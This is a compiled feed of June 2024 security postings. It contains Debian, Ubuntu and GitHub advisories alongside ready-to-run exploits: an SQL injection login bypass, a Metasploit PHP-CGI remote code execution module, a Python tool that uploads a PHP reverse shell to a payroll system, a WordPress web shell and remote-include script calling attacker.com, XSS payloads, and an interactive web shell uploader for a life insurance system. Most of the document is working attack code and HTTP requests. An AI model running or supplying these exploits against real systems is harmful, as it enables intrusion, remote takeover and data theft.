Debian Linux Security Advisory 5715-1 - Two vulnerabilities have been discovered in Composer, a dependency manager for PHP, which could result in arbitrary command execution by operating on malicious git/hg repositories.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5715-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 18, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : composerCVE ID         : CVE-2024-35241 CVE-2024-35242Two vulnerabilities have been discovered in Composer, a dependencymanager for PHP, which could result in arbitrary command execution byoperating on malicious git/hg repositories.For the oldstable distribution (bullseye), these problems have been fixedin version 2.0.9-2+deb11u3.For the stable distribution (bookworm), these problems have been fixed inversion 2.5.5-1+deb12u2.We recommend that you upgrade your composer packages.For the detailed security status of composer please refer toits security tracker page at:https://security-tracker.debian.org/tracker/composerFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZyAQwACgkQEMKTtsN8TjYxTw//by7RwssfrKcrNXWHLSJjcCJLtIUfDCzp31pxo9z1uc2viR1QYgfGgIB6yuUtjY0j8KDVBnvlpo8CTlt9Z5auzgQ0poGzshgKlvFcMwhzt7wQJtoF/mlO1dlABUcUyZvv8YLyKA4oYfRIN9bLSsldTb6gSV1bBTVLZeCggWb69HsFHrDxGmpKbcX43a+QL+qkScNu6wm7AdEG6RHDwJTJuFh72RjsONrg172i/6zL8wVqbGEg1HRYiFCCTYTniZsTi1eqQRSNzqIrq61Z/PFHhE7IS7DpNLF+8nVdTFAolou89/VTJSXO/nQCKR0MN/xHlctKY7wDj4lM3IrqNY0RoG1s4V/EiUz9fzdBitFvozPXgf45h45ETfv77NVw8quKrIQGKUNRtRBoemqHJ3J6ZpmGHyR5MRBjLdlZqnY0LtIq5dbj/AZJE48twaKbP8KsV6Yt7CtXe/c6zbqlRjZsV4p+4qOQtDuSqO751k3gWSLMtgogT4cmKLRuhhobe/zInQIsiUKcAmYiUcTjv2BXnSz2XYNfBn4Sd4/J2Bn+vMRMlLPOj7U3ZOIzZr5gWnSoJrUQEj68icbYHLG2jVGxLpZ+N3YlGEd+V+5N5sklR6Ggy5RjgPCB7at284WtvfU0EggKpgWhjoDx273K/EIVEAaEpvIUe3mhle1Tj3cdeYo==oulZ-----END PGP SIGNATURE-----

Debian Security Advisory 5715-1

User Registration and Management System version 3.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.:. Exploit Title > User Registration & Management System - SQLi.:. Google Dorks .:.inurl:loginsystem/index.php.:. Date: June 18, 2024.:. Exploit Author: bRpsd.:. Contact: cy[at]live.no.:. Vendor -> https://phpgurukul.com/.:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003.:. Product Version -> Version 3.2.:. DBMS -> MySQL.:. Tested on > macOS [*nix Darwin Kernel], on local xampp@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#############|DESCRIPTION|#############"User Management System is a web based technology which manages user database and provides rights to update the their details In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us."===========================================================================================Vulnerability 1: Unauthenticated SQL Injection & Authentication bypassTypes: error-basedFile: localhost/admin/index.phpVul Parameter: USERNAME [POST]POST PoC #1: http://tom:8080/loginsystem/admin/index.phpHost: tomUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 38Origin: http://tomConnection: keep-aliveReferer: http://tom/loginsystem/admin/index.phpCookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2aUpgrade-Insecure-Requests: 1username='&password=test&login=Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9===========================================================================================Test #2 => Payload to skip authenticationhttp://localhost:9000/loginsystem/admin/index.phpusername=A' OR 1=1#&password=1&login=Response:302 redirect to dashboard.php===========================================================================================Vuln File:/loginsystem/admin/index.phpVul Code:<?php session_start();include_once('../includes/config.php');// Code for loginif(isset($_POST['login'])){$adminusername=$_POST['username'];$pass=md5($_POST['password']);$ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'");$num=mysqli_fetch_array($ret);if($num>0)

User Registration And Management System 3.2 SQL Injection

This Metasploit module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations on a Windows target. A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D) character. Additionally a target web server must be configured to run PHP under CGI mode, or directly expose the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch), and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches. XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'PHP CGI Argument Injection Remote Code Execution',        'Description' => %q{          This module exploits a PHP CGI argument injection vulnerability affecting PHP in certain configurations          on a Windows target. A vulnerable configuration is locale dependant (such as Chinese or Japanese), such that          the Unicode best-fit conversion scheme will unexpectedly convert a soft hyphen (0xAD) into a dash (0x2D)          character. Additionally a target web server must be configured to run PHP under CGI mode, or directly expose          the PHP binary. This issue has been fixed in PHP 8.3.8 (for the 8.3.x branch), 8.2.20 (for the 8.2.x branch),          and 8.1.29 (for the 8.1.x branch). PHP 8.0.x and below are end of life and have note received patches.          XAMPP is vulnerable in a default configuration, and we can target the /php-cgi/php-cgi.exe endpoint. To target          an explicit .php endpoint (e.g. /index.php), the server must be configured to run PHP scripts in CGI mode.        },        'License' => MSF_LICENSE,        'Author' => [          'Orange Tsai', # Original finder          'watchTowr', # Original PoC          'sfewer-r7' # Metasploit exploit        ],        'References' => [          ['CVE', '2024-4577'],          ['URL', 'https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability-en/'],          ['URL', 'https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/']        ],        'DisclosureDate' => '2024-06-06',        'Platform' => ['php', 'win'],        'Arch' => [ARCH_PHP, ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            # Tested with the payload: php/meterpreter/reverse_tcp            'Windows PHP', {              'Platform' => 'php',              'Arch' => ARCH_PHP            }          ],          [            # Tested with the payload: cmd/windows/http/x64/meterpreter/reverse_tcp            'Windows Command', {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Payload' => {                'BadChars' => '"'              }            }          ],        ],        'DefaultOptions' => {          'RPORT' => 80        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        # By default XAMPP in Windows is in a vulnerable configuration and the URI path /php-cgi/php-cgi.exe will        # be able to trigger the vulnerability, so long as the target system has its region set to a suitable locale        # that will perform the necessary Unicode best-fit character conversion.        # If the target is not XAMPP but it is vulnerable, the TARGETURI will need to be set to a suitable .php CGI script.        OptString.new('TARGETURI', [true, 'The path to a PHP CGI endpoint', '/php-cgi/php-cgi.exe']),      ]    )  end  def send_exploit_request_cgi(php_payload, allow_url_include: true)    php_content = "<?php #{php_payload}; die(); ?>"    vprint_status("PHP content: #{php_content}")    # The exploit https://github.com/W01fh4cker/CVE-2024-4577-RCE added several additional arguments    # which seems potentially useful and are included here too. Note, this link is now dead.    args = [      '-d suhosin.simulation=1', # Dis-arm Suhosin if it is present.      '-d disable_functions=""', # This directive allows you to disable certain functions      '-d open_basedir=', # open_basedir, if set, limits all file operations to the defined directory and below.      '-d auto_prepend_file=php://input', # Automatically add files before PHP document.      '-d cgi.force_redirect=0', # cgi.force_redirect prevents anyone from calling PHP directly with a URL      '-d cgi.redirect_status_env=0',      # To debug your payloads you can add this:      # '-d log_errors=On',      # '-d error_log=php_errors_log',      '-n' # No configuration (ini) files will be used    ]    # We add this by default as it is required for exploitation, however the check routine can leverage an error    # message if this setting is not defined, which allows us to detect vulnerable versions.    args << '-d allow_url_include=1' if allow_url_include # Whether to allow include/require to open URLs (like https:// or ftp://) as files.    query = args.shuffle.join(' ')    query = CGI.escape(query).gsub('-', '%AD')    vprint_status("Query: #{query}")    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path),      'encode_params' => false,      'vars_get' => {        query => nil      },      'data' => php_content    )  end  def check    res = send_exploit_request_cgi('', allow_url_include: false)    return CheckCode::Unknown('Connection failed') unless res    if res.code == 200 && (res.body.include? '\'php://input\'')      return CheckCode::Vulnerable(res.headers['Server'])    end    CheckCode::Safe('Ensure TARGETURI is set to a valid PHP CGI endpoint.')  end  def exploit    if target['Arch'] == ARCH_CMD      php_bootstrap = []      if payload.encoded.include? '%TEMP%'        var_cmd = "$#{Rex::Text.rand_text_alpha(8)}"        php_bootstrap << "#{var_cmd} = \"#{payload.encoded}\""        php_bootstrap << "#{var_cmd} = str_replace('%TEMP%', sys_get_temp_dir(), #{var_cmd})"      end      php_bootstrap << "system(#{var_cmd})"      php_payload = php_bootstrap.join(';')    else      php_payload = payload.encoded    end    send_exploit_request_cgi(php_payload)  endend

PHP CGI Argument Injection Remote Code Execution

Ubuntu Security Notice 6835-1 - It was discovered that Ghostscript did not properly restrict eexec seeds to those specified by the Type 1 Font Format standard when SAFER mode is used. An attacker could use this issue to bypass SAFER restrictions and cause unspecified impact. This issue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.10. Thomas Rinsma discovered that Ghostscript did not prevent changes to uniprint device argument strings after SAFER is activated, resulting in a format-string vulnerability. An attacker could possibly use this to execute arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
NotDashEscaped: You need gpg to verify this message

==========================================================================  
Ubuntu Security Notice USN-6835-1  
June 17, 2024

ghostscript vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in Ghostscript.

Software Description:  
- ghostscript: PostScript and PDF interpreter

Details:

It was discovered that Ghostscript did not properly restrict eexec  
seeds to those specified by the Type 1 Font Format standard when  
SAFER mode is used. An attacker could use this issue to bypass SAFER  
restrictions and cause unspecified impact. (CVE-2023-52722)  
This issue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.10.

Thomas Rinsma discovered that Ghostscript did not prevent changes to  
uniprint device argument strings after SAFER is activated, resulting  
in a format-string vulnerability. An attacker could possibly use this  
to execute arbitrary code. (CVE-2024-29510)

Zdenek Hutyra discovered that Ghostscript did not properly perform  
path reduction when validating paths. An attacker could use this to  
access file locations outside of those allowed by SAFER policy and  
possibly execute arbitrary code. (CVE-2024-33869)

Zdenek Hutyra discovered that Ghostscript did not properly check  
arguments when reducing paths. An attacker could use this to  
access file locations outside of those allowed by SAFER policy.  
(CVE-2024-33870)

Zdenek Hutyra discovered that the "Driver" parameter for Ghostscript's  
"opvp"/"oprp" device allowed specifying the name of an arbitrary dynamic  
library to load. An attacker could use this to execute arbitrary code.  
(CVE-2024-33871)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  ghostscript                     10.02.1~dfsg1-0ubuntu7.1  
  ghostscript-doc                 10.02.1~dfsg1-0ubuntu7.1

Ubuntu 23.10  
  ghostscript                     10.01.2~dfsg1-0ubuntu2.3  
  ghostscript-doc                 10.01.2~dfsg1-0ubuntu2.3  
  ghostscript-x                   10.01.2~dfsg1-0ubuntu2.3

Ubuntu 22.04 LTS  
  ghostscript                     9.55.0~dfsg1-0ubuntu5.7  
  ghostscript-doc                 9.55.0~dfsg1-0ubuntu5.7  
  ghostscript-x                   9.55.0~dfsg1-0ubuntu5.7

Ubuntu 20.04 LTS  
  ghostscript                     9.50~dfsg-5ubuntu4.12  
  ghostscript-doc                 9.50~dfsg-5ubuntu4.12  
  ghostscript-x                   9.50~dfsg-5ubuntu4.12

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6835-1  
  CVE-2023-52722, CVE-2024-29510, CVE-2024-33869, CVE-2024-33870,  
  CVE-2024-33871

Package Information:  
  https://launchpad.net/ubuntu/+source/ghostscript/10.02.1~dfsg1-0ubuntu7.1  
  https://launchpad.net/ubuntu/+source/ghostscript/10.01.2~dfsg1-0ubuntu2.3  
  https://launchpad.net/ubuntu/+source/ghostscript/9.55.0~dfsg1-0ubuntu5.7  
  https://launchpad.net/ubuntu/+source/ghostscript/9.50~dfsg-5ubuntu4.12  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEETB/nIDy9nvCSgAUj3gXQmO/Tr3wFAmZwxK4ACgkQ3gXQmO/T  
r3yOAQ/+NUTiKTAkI/XpceJpULY0tJiBZR37xhnxiKSuFoAQY5RrRuGxpC6sPXwi  
16Xoyo2gvDEfeaV4zn/jCfw4Lf4L1+JNbAOS1Yvnvg0Ags+b/bAUAlMV0E+7Jyap  
gVbd7T8c2oIMFFq6S78qi5Gl4kyHYiVAgxZNtJiMztTpF+qG2frcObLIW5JpzQZ3  
mZIRtoSAjyhKOoAfq2BXq/nuk0GzXu4wGEN2FEag6VRRW92Ti0rfdYjNYgcQ44Ii  
VTM5bYtvIjqI+uLbUEUiPQ91OZ4yg3K/pTRLnIVyoAo95Huqc6N+lZmXD97yokXj  
m4BU1iWSFBUS2kf/3aoNtkGqhIv/2sGYs3CNHBC23eE7IXsBbwaCpeF8Ogsx2eKe  
phpJMeCtvdTmq4+s0l5r4mwAKhHuvklQGwHe/5sDpJbZTW1qtdWmFzXaiKyHGDDw  
0nEyKkRKP0c3yC6I0Aht2gVk/pYiwhpVe5TGICl0lbRXO7DEEU5ns2t+C0xnMBz4  
cV2FE6rouRDJTlFPWtLmxT0BpHn+xBMLabEuPFJAlXRjy9dLKPrZVgkXe/9NROQm  
hUCuuKAHLKWK8rZC1c3T2DiE9dDQZs9KUZRKB0ZhZzLYC+pGu8DW9Ud6NDMB3LAO  
yDANPKeEG+09Ho2u4NbhbuLUMSzvNazZDpm2ZMi1vECul/nZ/ns=  
=WJrB  
-----END PGP SIGNATURE-----

Ubuntu Security Notice USN-6835-1

apphp js-object-resolver < 3.1.1 is vulnerable to Prototype Pollution via Module.setNestedProperty.

**Object Resolver Prototype Pollution**

Moderate severity GitHub Reviewed Published Jun 17, 2024 to the GitHub Advisory Database • Updated Jun 17, 2024

GHSA-qj86-v6m7-4qv2: Object Resolver Prototype Pollution

Payroll Management System version 1.0 suffers from a remote code execution vulnerability.

    # Exploit Title: Payroll Management System v1.0 RCE (Unauthenticated)# Google Dork: intitle:"Employee's Payroll Management System"# Date: 16/06/2024# Exploit Author: ShellUnease# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html# Version: v1.0# Tested on: Kali Linux Apache Web Server# CVE : CVE-2024-34833#!/usr/bin/pythonimport argparseimport timeimport requestsclass Exploit:    def __init__(self, rhost, rport, lhost, lport, https):        self.rhost = rhost        self.rport = rport        self.lhost = lhost        self.lport = lport        self.targetUrl = f'https://{rhost}:{rport}' if https else f'http://{rhost}:{rport}'        self.banner()    def banner(self):        print("""  _____                      _ _                                |  __ \                    | | |                               | |__) |_ _ _   _ _ __ ___ | | |                               |  ___/ _` | | | | '__/ _ \| | |                               | |  | (_| | |_| | | | (_) | | |                               |_|  _\__,_|\__, |_|  \___/|_|_|                          _    |  \/  |     __/ |                                       | |   | \  / | __ |___/_   __ _  __ _  ___ _ __ ___   ___ _ __ | |_  | |\/| |/ _` | '_ \ / _` |/ _` |/ _ \ '_ ` _ \ / _ \ '_ \| __| | |  | | (_| | | | | (_| | (_| |  __/ | | | | |  __/ | | | |_  |_|__|_|\__,_|_| |_|\__,_|\__, |\___|_|_|_| |_|\___|_|_|_|\__|  / ____|         | |       __/ |     |  __ \ / ____|  ____|    | (___  _   _ ___| |_ ___ |___/___   | |__) | |    | |__        \___ \| | | / __| __/ _ \ '_ ` _ \  |  _  /| |    |  __|       ____) | |_| \__ \ ||  __/ | | | | | | | \ \| |____| |____     |_____/ \__, |___/\__\___|_| |_| |_| |_|  \_\\_____|______|             __/ |                                                         |___/                                                          """)    def get_data(self):        return {            'name': 'John Doe',            'email': 'jdoe@gmail.com',            'contact': 'John Doe',            'about': 'John Doe',        }    def get_payload(self):        return (f'<?php $sock=fsockopen("{self.lhost}",{self.lport});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, '                f'2=>$sock),$pipes); ?>')    def upload_rev_shell(self):        url = f'{self.targetUrl}/ajax.php?action=save_settings'        print(f'Uploading a reverse shell via {url}')        requests.post(url, files={'img': ('a.php', self.get_payload())},                      data=self.get_data())        epoch = time.time()        timestamp = epoch - (epoch % 60)        timestamp_minus_one_min = timestamp - 60        timestamp_plus_one_min = timestamp + 60        return [f'{int(timestamp)}_a.php', f'{int(timestamp_minus_one_min)}_a.php',                f'{int(timestamp_plus_one_min)}_a.php']    def open_rev_shell(self, candidates):        print('Opening a reverse shell')        for candidate in candidates:            url = f'{self.targetUrl}/assets/img/{candidate}'            try:                requests.get(url).raise_for_status()                print(f'Got a success response for {url}, you should have a revshell')                return            except Exception as e:                print(f'Failed to open revshell using {url}')        print('Guessing filename failed')    def exploit(self):        candidates = self.upload_rev_shell()        self.open_rev_shell(candidates)def get_args():    parser = argparse.ArgumentParser(        description='Payroll Management System - Remote Code Execution (RCE) (Unauthenticated)')    parser.add_argument('-rhost', '--remote-host', dest="rhost", required=True, action='store', help='Remote host')    parser.add_argument('-rport', '--remote-port', dest="rport", required=False, action='store', help='Remote port',                        default=80)    parser.add_argument('-lhost', '--local-host', dest="lhost", required=True, action='store', help='Local host')    parser.add_argument('-lport', '--local-port', dest="lport", required=True, action='store', help='Local port')    parser.add_argument('-https', '--https', dest="https", required=False, action='store_true', help='Use https')    args = parser.parse_args()    return argsif __name__ == '__main__':    args = get_args()    exp = Exploit(args.rhost, args.rport, args.lhost, args.lport, args.https)    exp.exploit()

Payroll Management System 1.0 Remote Code Execution

WordPress RFC WordPress plugin version 6.0.8 suffers from a remote shell upload vulnerability.

    Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8 import requestsimport sys target = "https://target.com" # Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8#CODE BY E1.Coders  "The King of Security"def exploit_rfc_wordpress():    url = f"{target}/wp-content/plugins/rfc-wordpress/rfc.php"    payload = "<?php system($_GET['cmd']); ?>"       try:        response = requests.post(url, data={"rfc_action": "save_settings", "rfc_settings": payload})        if response.status_code == 200:            print("RCE exploit successful!")            print(f"Visit {url}?cmd=whoami to execute commands")        else:            print("RCE exploit failed.")    except requests.exceptions.RequestException as e:        print(f"Error: {e}") # Exploit for Remote File Inclusion (RFI) in RFC WordPressdef exploit_rfi_rfc_wordpress():    url = f"{target}/wp-content/plugins/rfc-wordpress/rfc.php?rfc_action=save_settings"    payload = "http://attacker.com/shell.php"       try:        response = requests.post(url, data={"rfc_settings": payload})        if response.status_code == 200:            print("RFI exploit successful!")            print(f"Visit {target}/wp-content/plugins/rfc-wordpress/shell.php to execute commands")        else:            print("RFI exploit failed.")    except requests.exceptions.RequestException as e:        print(f"Error: {e}") if __name__ == "__main__":    exploit_rfc_wordpress()    exploit_rfi_rfc_wordpress()

WordPress RFC WordPress 6.0.8 Shell Upload

Premium Support Tickets For WHMCS version 1.2.10 suffers from a cross site scripting vulnerability.

    Exploit Title: Premium Support Tickets For WHMCS Reflected XSSExploit Author: Sajibe KantiVendor: ModulesGardenVendor Homepage:https://www.modulesgarden.com/products/whmcs/premium-support-ticketsProduct Name: Premium Support Tickets For WHMCSProduct Version: v1.2.10Tested Version: WHMCS 8.10.1Tested on: Windows 10Vulnerabilities Discovered Date: 29/04/2024Description:The Premium Support Tickets For WHMCS plugin by ModulesGarden is vulnerableto a reflected cross-site scripting (XSS) attack. This vulnerability allowsan attacker to inject malicious JavaScript code into the "error&msg="parameter of the submitticket.php page, leading to the execution ofarbitrary code in the context of the victim's browser.Proof of Concept (POC):1. Identify a website that utilizes the Premium Support Tickets For WHMCSplugin by ModulesGarden.2. Navigate to the ticket submission page (submitticket.php).3. Select any department to open a new ticket.4. If you lack support credit points, you will receive an error messagewith the parameter "error&msg=clientarea_message_cantcreateinthisdept".5. Inject your payload into the "error&msg=" parameter.6. Construct the following URL with your payload:https://example.com/submitticket.php?PremiumSupportTickets=error&msg=%22/%3E%3CsvG%20onLoad=alert(/xss/)%3E7. Replace the payload with your desired XSS payload:   "<svg/onLoad=alert(/OPENBUGBOUNTY/)>"8. Visit the modified URL in your browser.9. Observe the XSS popup indicating successful exploitation of thevulnerability.Impact:Successful exploitation of this vulnerability could allow an attacker toexecute arbitrary JavaScript code in the context of an authenticated user'sbrowser session. This could lead to various attacks, including but notlimited to:- Theft of sensitive information (session cookies, credentials, etc.)- Phishing attacks targeting users of the affected WHMCS instance- Defacement of the website or redirection to malicious content- Browser-based attacks such as keylogging or screen capturingNote: This exploit is for educational purposes only. Unauthorized access toor modification of systems is illegal and unethical. Always obtain properauthorization before testing or exploiting vulnerabilities.

Premium Support Tickets For WHMCS 1.2.10 Cross Site Scripting

AEGON LIFE version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title:  Life Insurance Management Stored System- cross-site scripting (XSS)# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https://projectworlds.in/# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36599# Description:----------------A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.# Payload:----------------<script>alert(document.domain)</script># Attack Vectors:-------------------------To exploit this vulnerability use <script>alert(document.domain)</script> when user visit Client.php we can see the XSS.# Burp Suite Request:----------------------------POST /lims/insertClient.php HTTP/1.1Host: localhostContent-Length: 30423Cache-Control: max-age=0sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/lims/addClient.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78nConnection: close------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="client_id"1716051159------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="client_password"password------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="name"<script>alert(document.domain)</script>------WebKitFormBoundarymKfAe0x95923LzQHContent-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original"Content-Type: application/octet-streamÿØÿà

AEGON LIFE 1.0 Cross Site Scripting

AEGON LIFE version 1.0 suffers from an unauthenticated remote code execution vulnerability.

# Exploit Title:  Life Insurance Management System- Unauthenticated Remote Code Execution (RCE)  
# Exploit Author: Aslam Anwar Mahimkar  
# Date: 18-05-2024  
# Category: Web application  
# Vendor Homepage: https://projectworlds.in/  
# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/  
# Version: AEGON LIFE v1.0  
# Tested on: Linux  
# CVE: CVE-2024-36598

# Description:  
----------------

-An arbitrary file upload vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary code via uploading a crafted PHP file by adding image/gif magic bytes in payload.

-In insertClient.php fileToUpload is only checking for image file but not checking for extensions, also header.php is not properly handling the redirection hence allowing Unauthenticated redirect.

# Payload:  
------------------

payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"

# RCE via executing exploit:  
---------------------------------------

    # Step : run the exploit in python with this command: python3 shell.py  http://localhost/lims/  
    # will lead to RCE shell.

  POC  
-------------------

import argparse  
import random  
import requests  
import string  
import sys

parser = argparse.ArgumentParser()  
parser.add_argument('url', action='store', help='The URL of the target.')  
args = parser.parse_args()

url = args.url.rstrip('/')  
random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))

payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"

file = {'fileToUpload': (random_file + '.php', payload, 'text/php')}  
print('> Attempting to upload PHP web shell...')  
r = requests.post(url + '/insertClient.php', files=file, data={'agent_id':''}, verify=False)  
print('> Verifying shell upload...')  
r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)

if random_file in r.text:  
    print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php')  
    print('> Example command usage: ' + url + '/uploads/' + random_file + '.php?cmd=whoami')  
    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))  
    if launch_shell.lower() == 'y':  
        while True:  
            cmd = str(input('RCE $ '))  
            if cmd == 'exit':  
                sys.exit(0)  
            r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':cmd}, verify=False)  
            print(r.text)  
else:  
    if r.status_code == 200:  
        print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')  
    else:  
        print('> Web shell failed to upload! The web server may not have write permissions.')

---------------------------------------------------------------------------------------------------------------------------

### Can also performed manually.

Payload:  
--------------

GIF89a;  
<?php  
echo"<pre>";  
passthru($_GET['cmd']);  
echo"<pre>";  
?>

# Attack Vectors:  
-------------------------

After uploading malicious image can access it to get the shell

http://localhost/lims/uploads/shell2.gif.php?cmd=id

Burp Suit Request  
-----------------------------

POST /lims/insertClient.php HTTP/1.1  
Host: localhost  
Content-Length: 2197  
Cache-Control: max-age=0  
sec-ch-ua:   
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5plGALZGPOOdBlF0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/lims/addClient.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="client_id"

1716015032

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="client_password"

Password

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="name"

Test

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="fileToUpload"; filename="shell2.gif.php"  
Content-Type: application/x-php

GIF89a;  
<?php  
echo"<pre>";  
passthru($_GET['cmd']);  
echo"<pre>";  
?>

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="sex"

Male

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="birth_date"

1/1/1988

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="maritial_status"

M

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nid"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="phone"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="address"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="policy_id"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="agent_id"

Agent007

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_id"

1716015032-275794639

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_name"

Test1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_sex"

1
